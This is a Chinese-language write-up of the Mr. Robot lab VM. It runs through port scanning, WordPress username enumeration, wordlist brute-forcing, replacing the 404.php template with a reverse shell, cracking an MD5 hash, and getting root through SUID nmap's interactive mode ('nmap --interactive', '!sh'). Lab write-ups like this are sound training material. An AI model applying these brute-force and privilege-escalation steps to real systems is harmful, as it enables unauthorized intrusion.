# 靶场搭建
下载下来是 OVA 文件,虚拟机打开,开机前将网卡从桥接模式调整至 NAT 就可以了
IP 地址: 192.168.74.141
# 渗透过程
# 初期信息收集
┌──(root㉿kali)-[~] | |
└─# nmap -p- -T5 192.168.74.141 | |
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-09 04:28 EDT | |
Nmap scan report for bogon (192.168.74.141) | |
Host is up (0.00035s latency). | |
Not shown: 65532 filtered tcp ports (no-response) | |
PORT STATE SERVICE | |
22/tcp closed ssh | |
80/tcp open http | |
443/tcp open https | |
MAC Address: 00:0C:29:EA:7D:06 (VMware) | |
Nmap done: 1 IP address (1 host up) scanned in 54.25 seconds |
80,443 端口,又是 web 层面的攻击,麻木了
打开浏览器看了一眼,woc 这个真的牛逼,看上去真的很好玩
dirsearch 扫了一下发现有一个 robots.txt
进去看了一下有一些提示
User-agent: * | |
fsocity.dic | |
key-1-of-3.txt |
key-1-of-3: 073403c8a58a1f80d943455fb30724b9
fsocity.dic 是一个字典
对获取的信息感到困惑,思路卡住了
也许是密码吧,那账号是什么?也包含在里面了?wpscan 进行用户名枚举了,没有发现账号啊?
尝试使用 wpscan 进行列表账号枚举,但是好像没有这个功能 ==、抓包尝试,发现后台登录的时候如果账号不存在则会提示不存在,那就有枚举的空间了
直接导入这个字典进行爆破,拿到了账号 elliot
那接下来就可以用 wpscan 爆破了,再使用这个字典进行爆破得到密码: ER28-0652 。
真是沙比啊,放到最后,跑了 85 万啊!
# 文件上传
后台插件文件上传点有问题,不能直接传 php 了需要传 zip。还需要自己做一个包?拉倒吧!直接修改模板,把 404.php 覆盖成反弹 shell。
监听后,随便访问一个页面触发 404,直接拿到 shell
# 提权
低权限,需要拿权限
查看一下唯一一个用户 robot,里面有一个 md5 的密码: c3fcd3d76192e4007dfb496cca67e13b
通过 somd5.com 查询到密码为: abcdefghijklmnopqrstuvwxyz
通过 python 获取一个交互式 shell,然后 su 到 robot 账户上
robot 没有 sudo 权限 ==、
那要么用内核提权漏洞,要么就找 Setuid 权限的文件尝试利用: find / -perm -4000 2>/dev/null
发现机器上有 nmap,低版本的 nmap 具有交互模式,能够执行 shell 命令 (2.02 至 5.21)。
那么我们运行这个 nmap 交互模式: nmap --interactive
拿到 root 的 shell: !sh
nmap --interactive | |
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ ) | |
Welcome to Interactive Mode -- press h <enter> for help | |
nmap> !sh | |
!sh | |
# whoami | |
whoami | |
root |
# 小结
需要了解不同中间件历史版本,wordpress 插件上传变成了 zip。所以转而修改 404 页面进行反弹 shell。
爆破真是苦力活,靶场带宽足够,要是实战爆破真的是下下策。
nmap 低版本的交互功能可以执行 shell 命令
当用户没有 sudo 权限时,并且更好方法时,尝试找到 suid 文件,进行利用。
